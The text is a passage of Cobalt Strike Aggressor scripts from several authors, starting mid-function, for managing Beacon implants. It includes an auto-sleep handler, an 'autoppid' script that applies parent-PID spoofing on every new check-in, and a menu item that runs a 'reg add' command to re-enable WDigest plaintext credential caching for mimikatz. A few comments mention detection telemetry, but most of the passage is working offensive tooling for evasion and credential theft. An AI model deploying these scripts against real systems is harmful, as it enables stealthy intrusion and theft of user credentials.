$outps .= "$temp['entry'] \n";
}
return $outps;
}
#author bluescreenofjeff
#alias for "pspane" to open the process browser pane for the current Beacon
#register help
# Register help text for the "pspane" alias defined below, so `help pspane`
# shows the synopsis and description in the Beacon console.
beacon_command_register(
    "pspane",
    "open process browser pane",
    "Synopsis: pspane \n\nOpen the process browser pane for the current Beacon.");
#setting the alias
# "pspane": echo a "ps" entry into the current Beacon's console and open its process browser pane.
alias pspane {
    local('$bid');
    $bid = $1;
    binput($bid, "ps");
    openProcessBrowser($bid);
}
#author: bluescreenofjeff
# Increases the sleep interval on all Beacons when there are no operators logged in.
# Values applied to every Beacon's sleep interval and jitter when operators log off;
# both are passed straight to bsleep() in the event_quit handler below (sleep is in seconds).
$sleep_value = 300;
$jitter_value = 20;
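# When a client disconnects and the remaining user count is at or below the threshold,
# push the configured sleep/jitter to every Beacon that has no parent Beacon id.
on event_quit {
    # Scope the loop variable; Sleep foreach variables are otherwise global.
    local('$beacon');
    # NOTE: raise this threshold if you use agscript to log in and run scripts,
    # since those sessions count towards users() as well.
    if (size(users()) <= 2) {
        foreach $beacon (beacons()) {
            # Ignore SMB Beacons, identified here by a non-empty parent Beacon id.
            if ($beacon["pbid"] eq '') {
                bsleep($beacon["id"], $sleep_value, $jitter_value);
            }
        }
    }
}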
#
# Autoppid - script that smartly invokes the PPID command for every new Beacon check-in.
# The PPID command requires the invoking Beacon to have the same integrity level as the process it wants
# to assume as its parent. That is due to how InitializeProcThreadAttributeList with
# PROC_THREAD_ATTRIBUTE_PARENT_PROCESS works. To avoid a hardcoded explorer.exe PID assumption,
# we look for a configurable process name and then try to find that process running
# at the highest integrity level available to us. In that case, an unprivileged user would assume the PPID
# of, for instance, svchost.exe running as that user, whereas a privileged one could go for the
# svchost.exe running as NT AUTHORITY\SYSTEM. We aim to smartly pick the most advantageous target,
# in a dynamic fashion.
#
# The script also includes alias registration.
#
# Author: Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
#
# Name of the process you want to become the parent. It is used for parent PID
# spoofing, so your current process token must be able to open it.
$PARENT_PROCESS_NAME = "svchost.exe";
# Register "autoppid" help; the description strings interpolate $PARENT_PROCESS_NAME
# once, when the script is loaded.
beacon_command_register(
    "autoppid",
    "Automatically finds suitable PPID and sets it (target: $PARENT_PROCESS_NAME )",
    "Automatically finds suitable - according to the current user context - PPID and sets it (target: $PARENT_PROCESS_NAME )");
# Look up, on Beacon $1, a process named $3 running under the same user as the Beacon,
# then invoke callback $2 as [$2 : $bid, $pid, "\t" . ps_line] for the first match.
# The work is asynchronous: bps() tasks the Beacon and the lambda parses its reply.
sub findSuitableParentPID {
    local('$_bid $_callback $_processName $_userName');
    $_bid = $1;
    $_callback = $2;
    $_processName = $3;
    $_userName = binfo($1, "user");
    # binfo() may append " *" to the user (Cobalt Strike's elevation marker);
    # strip it so the name compares cleanly against the ps output.
    if (right($_userName, 2) eq ' *') {
        $_userName = substr($_userName, 0, strlen($_userName) - 2);
    }
    # The lambda captures the four values explicitly because, when it runs,
    # $1/$2 are bps()'s own arguments (Beacon id and raw process listing).
    bps($_bid, lambda({
        local('$tab $entry $name $pid $ppid $arch $user');
        # One process per line of the listing.
        foreach $entry (split("\n", $2)) {
            # Columns: name, ppid, pid, arch, user. Splitting on whitespace drops any
            # trailing session column and breaks user names that contain a space.
            ($name, $ppid, $pid, $arch, $user) = split("\\s+", $entry);
            # "NT AUTHORITY" contains a space, thus breaking our split results. Workaround:
            # re-read the user from the "NT " position up to the next tab, if one follows.
            if($user eq "NT") {
                $user = substr($entry, indexOf($entry, "NT "));
                $tab = indexOf($user, "\t");
                if ($tab) {
                    $user = substr($user, 0, $tab);
                }
            }
            # Only rows with a pid and the wanted image name qualify.
            if (($pid) && ($name eq $processName)) {
                if($user) {
                    # Substring match in either direction; presumably to tolerate a
                    # DOMAIN\ prefix present on only one side — confirm.
                    if( ($userName isin $user) || ($user isin $userName) ) {
                        [$callback : $bid, $pid, "\t" . $entry];
                        # First match wins; remaining rows are ignored.
                        break;
                    }
                }
            }
        }
    }, $bid => $_bid, $callback => $_callback, $userName => $_userName, $processName => $_processName));
}
# "autoppid [quiet]": find a $PARENT_PROCESS_NAME instance running as the Beacon's user
# and make it the parent PID for future post-ex jobs. The optional "quiet" argument
# suppresses the console messages (the beacon_error handler below re-runs it that way).
alias autoppid {
    local('$processName $userName $params');
    # $0 is the full command line; anything after "autoppid " is taken as the parameter.
    $params = "";
    if(strlen($0) > strlen("autoppid ")) {
        $params = substr($0, strlen("autoppid "));
    }
    $processName = $PARENT_PROCESS_NAME;
    $userName = binfo($1, "user");
    # Strip the trailing " *" elevation marker, as findSuitableParentPID does.
    # Note that $userName is only used in the btask message here; the actual
    # user comparison happens inside findSuitableParentPID.
    if (right($userName, 2) eq ' *') {
        $userName = substr($userName, 0, strlen($userName) - 2);
    }
    if($params ne "quiet") {
        btask($1, "Tasked Beacon to find $processName running as $userName and make it the PPID.");
    }
    # Callback receives ($1 = Beacon id, $2 = pid, $3 = ps line). In quiet mode the
    # "!" variant is used, which presumably skips the console acknowledgement — confirm.
    findSuitableParentPID($1, lambda({
        if($params ne "quiet") {
            blog!($1, "Future post-ex jobs will be spawned with fake PPID set to:\n$3");
            bppid($1, $2);
        } else {
            bppid!($1, $2);
        }
    }, $params => $params), $processName);
}
# Run "autoppid" (non-quiet, so the result is logged) as soon as a new Beacon checks in.
on beacon_initial {
    # Parent PID spoofing
    fireAlias($1, "autoppid", "");
}
# React to a failed PPID assignment reported by the Beacon. The error text is parsed
# for the attempted PPID and the Win32 error code: 87 (ERROR_INVALID_PARAMETER) is
# treated as "the chosen parent no longer exists" and triggers a quiet re-run of
# autoppid; 5 (ERROR_ACCESS_DENIED) clears the PPID; any other code retries quietly.
# $ppid is captured but not used beyond the match.
on beacon_error {
    local('$ppid $err');
    if ($2 ismatch 'Could not set PPID to (\d+): (\d+)' ) {
        ($ppid, $err) = matched();
        if($err == 87) {
            blog2($1, "Catched PPID error: \c4Previous parent process no longer exists\o. Finding a new one...");
            fireAlias($1, "autoppid", "quiet");
        }
        else if($err == 5) {
            blog2($1, "Catched PPID error:\c4 $err $+ \o. Access Denied. Don't know how to proceed. Reseting PPID to none.");
            # bppid with 0 removes the spoofed parent.
            bppid($1, 0);
        }
        else {
            blog2($1, "Catched PPID error:\c4 $err $+ \o. Will find another candidate for PPID spoofing.");
            fireAlias($1, "autoppid", "quiet");
        }
        # The failed job is not re-issued automatically; the operator is told to repeat it.
        blog2($1, "\c8 Repeat your last command as it failed.\o");
    }
}
#timwhite
# Beacon context-menu entry. For each selected Beacon it runs a shell command that sets
# HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1,
# which re-enables WDigest credential caching in LSASS. From a defensive standpoint this
# value is a well-known telemetry point: registry value-set events on this key
# (e.g. Sysmon Event ID 13) and "reg add" process creation from a Beacon are both visible.
# NOTE(review): the loop declares $bid but passes $1 (the whole selection) to bshell,
# so each iteration operates on the full selection rather than on one Beacon.
popup beacon_top
{
    menu "win 2012+[mimikatz]" {
        item "edit reg" {
            local('$bid');
            foreach $bid ($1){
                bshell($1, "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f");
            }
        }
    }
}